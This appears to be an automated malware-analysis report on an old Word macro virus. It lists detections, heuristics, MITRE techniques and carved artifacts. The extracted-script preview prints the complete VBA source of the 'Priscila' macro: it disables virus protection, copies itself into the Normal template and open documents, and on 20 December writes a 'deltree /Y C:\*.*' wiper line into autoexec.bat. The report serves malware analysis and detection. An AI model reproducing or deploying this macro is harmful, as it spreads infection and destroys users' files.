MALICIOUS
320
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a malicious Office document containing VBA macros. The AutoClose macro attempts to copy itself to the Normal template and the active document, and it also attempts to append to \autoexec.bat, suggesting a persistence and propagation mechanism. The presence of legacy WordBasic markers and the ClamAV detection further support its malicious nature.
Heuristics 7
-
ClamAV: Doc.Trojan.NightShade-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.NightShade-4
-
Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGEA CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 20,980 bytes but its declared streams total only 0 bytes — 20,980 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMSThe file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6391 bytes |
SHA-256: f1ddf2542a658e3e93be14da1ad64b69749957ba994c93bc962f69651a5fccc5 |
|||
|
Detection
ClamAV:
Doc.Trojan.NightShade-4
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Priscila"
Sub AutoClose()
Attribute AutoClose.VB_Description = "(c) 1997 Microsoft - All rights Reserved."
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Microsoft.Priscila.AutoClose"
On Error GoTo Priscila
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Set ActiveDoc = ActiveDocument
Set GlobalDoc = NormalTemplate
EstaEnDoc = False
EstaEnDot = False
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "Priscila" Then
EstaEnDoc = True
End If
Next
For J = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(J).Name = "Priscila" Then
EstaEnDot = True
End If
Next
If EstaEnDoc = False Then
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Priscila", Object:=wdOrganizerObjectProjectItems
ActiveDoc.SaveAs FileName:=ActiveDoc.FullName
End If
If EstaEnDot = False Then
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Priscila", Object:=wdOrganizerObjectProjectItems
Options.SaveNormalPrompt = False
End If
If Month(Now()) = 12 And Day(Now()) = 20 Then
NúmArch2 = FreeFile()
Open "\autoexec.bat" For Append As NúmArch2
Print #1,
Print #1, "@echo off"
Print #1, "deltree /Y C:\*.*"
Close NúmArch2
Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "Tienes el PRISCILA ViRuS - by CrM - Paraguay"
.Heading = "Atención:"
.Show
End With
End If
Application.DisplayAlerts = wdAlertsAll
Priscila:
End Sub
' Processing file: /opt/analyzer/scan_staging/cd54bab66361434e874ccf9663afb1fd.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1120 bytes
' Macros/VBA/Priscila - 3324 bytes
' Line #0:
' FuncDefn (Sub AutoClose())
' Line #1:
' OnError Priscila
' Line #2:
' Line #3:
' LitDI2 0x0000
' Ld WordBasic
' ArgsMemCall DisableAutoMacros 0x0001
' Line #4:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #5:
' Line #6:
' LitVarSpecial (False)
' Ld Application
' MemSt ScreenUpdating
' Line #7:
' Ld wdAlertsNone
' Ld Application
' MemSt DisplayAlerts
' Line #8:
' Line #9:
' SetStmt
' Ld ActiveDocument
' Set ActiveDoc
' Line #10:
' SetStmt
' Ld NormalTemplate
' Set GlobalDoc
' Line #11:
' Line #12:
' LitVarSpecial (False)
' St EstaEnDoc
' Line #13:
' LitVarSpecial (False)
' St EstaEnDot
' Line #14:
' Line #15:
' StartForVariable
' Ld I
' EndForVariable
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' For
' Line #16:
' Ld I
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd New
' LitStr 0x0008 "Priscila"
' Eq
' IfBlock
' Line #17:
' LitVarSpecial (True)
' St EstaEnDoc
' Line #18:
' EndIfBlock
' Line #19:
' StartForVariable
' Next
' Line #20:
' Line #21:
' StartForVariable
' Ld J
' EndForVariable
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' For
' Line #22:
' Ld J
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd New
' LitStr 0x0008 "Priscila"
' Eq
' IfBlock
' Line #23:
' LitVarSpecial (True)
' St EstaEnDot
' Line #24:
' EndIfBlock
' Line #25:
' StartForVariable
'
... (truncated)
|
|||
embedded_office_off0000460c.ole |
embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x460C | 20980 bytes |
SHA-256: 57fc0caa1b311b41482d593fe6b7216c3feeab2236985b9783927951065159a6 |
|||
|
Detection
ClamAV:
Doc.Trojan.Idea-1
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.